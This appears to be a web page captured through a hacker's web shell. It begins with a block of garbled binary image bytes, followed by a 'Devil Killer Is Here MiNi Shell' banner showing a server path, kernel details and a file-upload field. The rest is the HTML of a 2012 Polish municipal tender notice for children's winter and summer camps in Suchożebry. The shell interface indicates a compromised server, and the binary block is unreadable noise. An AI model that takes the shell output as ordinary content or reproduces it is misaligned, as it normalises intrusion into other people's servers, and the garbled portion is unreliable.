JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120912/196133-N-2012.html

<p class="kh_header"><b>Suchożebry: Zorganizowanie wypoczynku zimowego i letniego dla dzieci w wieku od 10 do 13 lat w ramach projektu ,Doświadczam, przeżywam, poznaję</b><br>
<b>Numer ogłoszenia: 196133 - 2012; data zamieszczenia: 12.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suchożebry , ul. Aleksandry Ogińskiej 11, 08-125 Suchożebry, woj. mazowieckie, tel. 0-25 63 145 15, faks 0-25 63 145 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wypoczynku zimowego i letniego dla dzieci w wieku od 10 do 13 lat w ramach projektu ,Doświadczam, przeżywam, poznaję.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem postępowania jest  usługa  pn:  Zorganizowanie wypoczynku zimowego i letniego dla dzieci w wieku od 10 do 13 lat w ramach projektu Doświadczam, przeżywam, poznaję,  w tym:

Część I - Organizacja turnusu zimowiska w górach 
Część II - Organizacja turnusu obozu letniego nad morzem 
Część III - Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego 
Część IV Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego.  
Część V Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego. 
Część VI Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego. 
Część VII Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego.  
Część VIII Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego.  
Część IX Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego.
Część X Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego. 
Szczegółowy opis Części zamówienia znajduje się w załaczniku do niniejszego Ogłoszenia. 
3.2. Dotyczy CZĘŚCI III - X
 a) Osoba wykonująca zadana opiekuna-wychowawcy musi posiadać uprawnienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696) 
b) Osoby wykonujące zamówienie muszą posiadać pełną zdolność do czynności prawnych i korzystać z praw publicznych; nie toczy się przeciwko nim postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie były karane za przestępstwo popełnione umyślnie; Na podstawie art.10 ust. 5 pkt 2, 3 i 4 oraz ust. 8 ustawy z dnia 26 stycznia 1982 r. - Karta Nauczyciela (Dz.U. z 2006 r. Nr 97, poz. 674 ze zm.) Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania turnusów - zimowego i letniego.
3.3. Wykonawca może złożyć ofertę na dowolną ilość części zamówienia. Części III-X będą realizowane w tym samym czasie, w związku z czym do realizacji każdego zadania powinna być wskazana inna osoba. Jedna do każdego zadania.
3.4. W przypadku wystąpienia sprzeczności w dokumentach tworzących SIWZ, wiążącą decyzję w tych sprawach podejmuje Zamawiający..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 63.50.00.00-4, 92.00.00.00-1, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta  Wykonawcy będzie zawierać:
a)	wypełniony formularz ofertowy (zał. 1),
b)	dokumenty i oświadczenia wymienione w pkt. VII niniejszej Specyfikacji.
c)	zaparafowany przez Wykonawcę egzemplarz Załącznika nr 4a/4b SIWZ pn. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego- stosownie do zadania/ zadań na które Wykonawca składa ofertę.
d)	pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, (jeśli dotyczy);
e)	Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych  wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza  odpisu  lub  wyciągu  z dokumentu,  lub  kopii  poświadczonej  za zgodność z oryginałem przez mocodawcę
f)	Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, lub kopii poświadczonej za zgodność z oryginałem przez mocodawcę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający z zastrzeżeniem p. 2. dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach: a) w uzasadnionych przypadkach lub innych okolicznościach niezależnych od Zamawiającego lub Wykonawcy konieczna będzie zmiana terminu realizacji zamówienia, Zamawiający na wniosek Wykonawcy może przedłużyć termin realizacji zamówienia. Okolicznościami takimi będą: niesprzyjające warunki atmosferyczne, siła wyższa, awarie, katastrofy, akty wandalizmu, b) w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, c) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zmiany wynikły w trakcie realizacji zamówienia, Zamawiający dopuszcza przedłużenie terminu wykonania przedmiotu umowy w następujących przypadkach: - zawieszenie wykonywania usług przez Zamawiającego d) zmiany postanowień umowy następuje w formie pisemnej pod rygorem nieważności. 2. Zmiany dotyczące wydłużenia terminu realizacji zamówienia (wykonania umowy), będą możliwe jedynie w przypadku gdy Zamawiający uzyska zgodę Instytucji Wdrażającej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 na wydłużenie terminu realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.suchozebry.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Suchożebry ul. A. Ogińskiej 11, 08-125 Suchożebry Cena 30,00zł + koszt przesyłki za pobraniem (jeśli dotyczy).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2012 godzina 11:30, miejsce: Urząd Gminy Suchożebry ul. A. Ogińskiej 11, 08-125 Suchożebry Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013r Priorytet. IX. Rozwój wykształcenia i kompetencji w regionach, działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Organizacja turnusu zimowiska w górach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) Przedmiotem zamówienia jest zorganizowanie zimowiska w terminie
28.01.2013r. - 03.02 2013r. dla 80 uczniów Szkół Podstawowych w Suchożebrach,  Krześlinie i Krynicy w wieku od 10 do 13 lat oraz 8 opiekunów i  kierownika projektu, zgodnie z przepisami Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 218.1696) zmieniające rozporządzenie w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania. 
B) Miejsce pobytu, Polska: województwo małopolskie, powiat tatrzański
C) Obiekt: 
1) w miejscowości w górach z dostępem max. 500 m do stoku dostosowanego do nauki jazdy na nartach dla dzieci 
2) teren ośrodka powinien być usytuowany z dala od dróg o dużym natężeniu ruchu oraz od torów kolejowych, tj. w odległości nie mniejszej niż 500 m i musi być ogrodzony, oświetlony i strzeżony. Ośrodek, w którym będzie zorganizowany wypoczynek, musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno- sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. 
Uwaga! Zamawiający nie wyraża zgody na zakwaterowanie uczestników w domkach campingowych, pawilonach. 
3) zakwaterowanie dzieci, kadry wychowawców, kierownika projektu w jednym ośrodku 
(w rozumieniu przepisów ustawy Prawo budowlane), 
4) w pokojach dzieci maksymalnie 4 łóżka, z wyłączeniem łóżek piętrowych i tzw. dostawek, 5) pokoje z pełnym węzłem sanitarnym (natrysk, umywalka i wc) ze standardowym wyposażeniem: telewizor oraz szafka nocna przy każdym łóżku - tapczaniku, szafa z wieszakami i półkami, stół (stolik) i  krzesła w ilości odpowiadającej ilości dzieci w pokoju, 
6) pokoje i łazienki muszą być estetyczne i czyste, 
7) pokoje wychowawców i dzieci muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników kolonii na sąsiadujących kondygnacjach, na każdej z nich musi znajdować się pokój wychowawców, 
8) ciepła woda bez ograniczeń , 
9) na terenie ośrodka powinna znajdować się stołówka, 
10) na terenie ośrodka bądź w jego najbliższej okolicy powinien znajdować się ogólnie dostępny telefon na kartę magnetyczną /chipową , 
11) ośrodek musi dysponować : a) salą dyskotekowa ze sprzętem dyskotekowym, b) świetlicą wyposażoną w stoliki i krzesła, gry planszowe, układanki itp, c) izolatką , oddzielną dla dziewcząt i chłopców, d) salą przystosowaną do prowadzenia zajęć , e) sprzętem do prasowania, pomieszczeniem do suszenia odzieży i przechowywania sprzętu narciarskiego. 
12) Organizator wypoczynku zapewnia możliwość korzystania ze stoku do nauki jazdy na nartach spełniającego wymogi bezpieczeństwa oraz instruktorów nauki jazdy na nartach w ilości 1 instruktor na 10 dzieci, co najmniej 8 godzin nauki jazdy na nartach dla każdej grupy. Organizator wypoczynku zapewnia także możliwość nieodpłatnego korzystania ze sprzętu narciarskiego (buty narciarskie, narty, kijki, kaski) dostosowanego do wieku i potrzeb uczestników zimowiska. Wykonawca zobowiązany jest do zapewnienia warunków bezpieczeństwa uczestników zimowiska, a w szczególności podczas nauki jazdy na nartach.
13) Wykonawca zapewni nieodpłatną dostępność wymienionych w pkt 11 obiektów i sprzętów. Uwaga! Zamawiający przed podpisaniem umowy z wybranym wykonawcą zastrzega sobie prawo kontroli obiektu. Placówka zatwierdzona przez Kuratorium Oświaty - zgodnie z przepisami MEN. Na 14 dni przed przewozem uczestników wykonawca zobowiązany jest do przedstawienia zaświadczenia wydanego przez Kuratora Oświaty właściwego dla miejsca zlokalizowania placówki wypoczynkowej o jej zarejestrowaniu 
D) Ilość i czas trwania turnusów: 1) wypoczynek dla dzieci ma być zorganizowany w formie jednego turnusu, 2) czas trwania turnusu od daty wyjazdu do daty przyjazdu- 7 dni, tj 7 dób (6 noclegów).
E) Liczba uczestników obozu: Uczestnikami zimowiska będą uczniowie Szkół Podstawowych w Suchożebrach,  Krześlinie i Krynicy w wieku 10 - 13 lat, ogółem 80 dzieci. Zamawiający we własnym zakresie zorganizuje nabór uczestników zimowiska. Lista uczestników przekazana będzie Wykonawcy zamówienia na 7 dni przed planowanym turnusem. Zamawiający we własnym zakresie zorganizuje nabór wychowawców. Lista i informacja o dokumentach zostaną przekazane na 3 tygodnie przed terminem zimowiska. 
F) Wymogi dotyczące wyżywienia: 
1) 4 (cztery) posiłki dziennie: śniadanie, obiad - składający się z dwóch ciepłych dań , podwieczorek i kolacja, 
2)zapewnienie obiadu (na trasie przejazdu: w drodze tam i z powrotem) oraz suchego prowiantu na drogę powrotną z miejsca pobytu do Suchożebrów, Krześlina i Krynicy oraz podczas wycieczek zaplanowanych w programie ramowym zimowiska, 
3) dzieci muszą mieć stały dostęp do napoi - w stołówce lub na korytarzu przed stołówką Wykonawca udostępni ciepłe napoje w termosie , np. herbatę z cytryną, 
4)posiłki winny być urozmaicone, odpowiadające normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, bogatych w witaminy, owoce i warzywa, Niedopuszczalne jest podawanie posiłków w formie szwedzkiego stołu 
5) turnus rozpoczyna się kolacją w obiekcie w pierwszym dniu pobytu (obiad na trasie dojazdu) i kończy się śniadaniem w ostatnim dniu pobytu (obiad na trasie powrotu). W czasie całodniowych wycieczek autokarowych (jeśli takie znajdą się w programie zimowiska) dzieci otrzymują: śniadanie,  suchy prowiant na czas trwania wycieczki ( dwie bułki: z serem i wędliną, bułkę słodką, banana lub jabłko, batona, jeden soczek w kartoniku o pojemności 250 ml), ciepła herbata z cytryną w termosach w autokarze, a po powrocie tzw. obiadokolację czyli dwudaniowy obiad. 
G) Transport: 1) transport zapewnia Wykonawca, 2) transport autokarowy z ogrzewaniem i WC na trasie: Szkoła Podstawowa w Suchożebrach, Krynicy, Krześlinie - obiekt wypoczynkowy, obiekt wypoczynkowy- Szkoła Podstawowa w Krześlinie, Krynicy, Suchożebrach, 3) dwa pojazdy muszą być sprawne z aktualnym przeglądem technicznym, obsługa dwóch   kierowców. Autokary muszą być wyposażone w dostateczną liczbę miejsc siedzących zgodnie z liczbą przewożonych uczestników, 4) dokładne godziny wyjazdu i powrotu autokarów ustalone zostaną w późniejszym okresie, 5). Zamawiający wyklucza przewóz dzieci autokarami w godzinach nocnych tzn. między godz. 22.00 a 6.00. 6) Koszty ubezpieczenia autokarów i dzieci podczas przejazdu pokrywa Wykonawca. 7) Zamawiający zastrzega sobie prawo powiadomienia Policji w celu kontroli pojazdu przed wyjazdem dzieci na zimowisko oraz przed powrotem 8) w przypadku awarii autokaru wykonawca zapewnia autokar zastępczy (o takim samym standardzie) na własny koszt. Do grupy podczas transportu nie może być dołączona inna grupa, 
H). Wykonawca zapewnia kierownika zimowiska. Zadania Kierownika zimowiska obejmować będą przygotowanie i realizację turnusu zimowego, nadzorowanie nauczycieli - wychowawców , kierowanie wypoczynkiem zgodnie z obowiązującymi przepisami; 
1) opracowywanie planu pracy oraz rozkładu dnia wypoczynku i kontrola ich realizacji; 
2) ustalenie i przydzielenie szczegółowego zakresu czynności poszczególnym opiekunom 
3) kontrola wykonywania obowiązków przez pracowników; 
4) zapewnienie uczestnikom wypoczynku właściwej opieki i warunków bezpieczeństwa od momentu przejęcia ich od rodziców (prawnych opiekunów) do czasu ponownego przekazania rodzicom (prawnym opiekunom); 
5) nadzorowanie zapewnienia odpowiednich warunków zdrowotnych i higieniczno-sanitarnych w miejscu wypoczynku, zgodnie z obowiązującymi przepisami w zakresie stanu sanitarnego pomieszczeń i otoczenia;
6) informowanie o zachowaniu dzieci i młodzieży oraz ich stanie zdrowia - na wniosek rodziców (prawnych opiekunów); 
7) zapewnienie zróżnicowanej diety uczestnikom wypoczynku; 
8) przechowywanie kopii dokumentów poświadczających kwalifikacje pracowników pedagogicznych przez okres trwania turnusu - łącznie dni (jeden dzień = 24 godz.) - 7dni.
Osoba wykonująca zadania kierownika turnusu musi posiadać uprawnienia kierownika wypoczynku zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie musza spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696). Osoba wykonująca zadania kierownika turnusu musi posiadać pełną zdolność do czynności prawnych i korzystać z praw publicznych; nie toczy się przeciwko niej postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie była karane za przestępstwo popełnione umyślnie; Na podstawie art.10 ust. 5 pkt 2, 3 i 4 oraz ust. 8 ustawy z dnia 26 stycznia 1982 r. - Karta Nauczyciela (Dz.U. z 2006 r. Nr 97, poz. 674 ze zm.)
I) Ubezpieczenie: 1)Wykonawca zapewnia ubezpieczenie uczestników i kadry od następstw nieszczęśliwych wypadków i kosztów leczenia, 2)ubezpieczenie obejmuje okres od momentu przekazania dzieci pod opiekę wychowawców z miejsca zbiórki tj: Szkoły Podstawowej w Suchożebrach, Krynicy i Krześlinie do momentu odebrania dzieci przez opiekunów/ rodziców przy Szkole Podstawowej w Krześlinie, Krynicy i Suchożebrach. 3)Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników zimowiska w trakcie podróży oraz podczas pobytu dzieci w ośrodku, 4)Wykonawca zobowiązany jest do posiadania ubezpieczenia OC. 
J) Wymagana jest obecność przedstawiciela Wykonawcy w dniu wyjazdu turnusu, 
K) Opieka: Na turnusie Wykonawca zapewnia: 1) kierownika obiektu, 2) pilota wycieczek, 
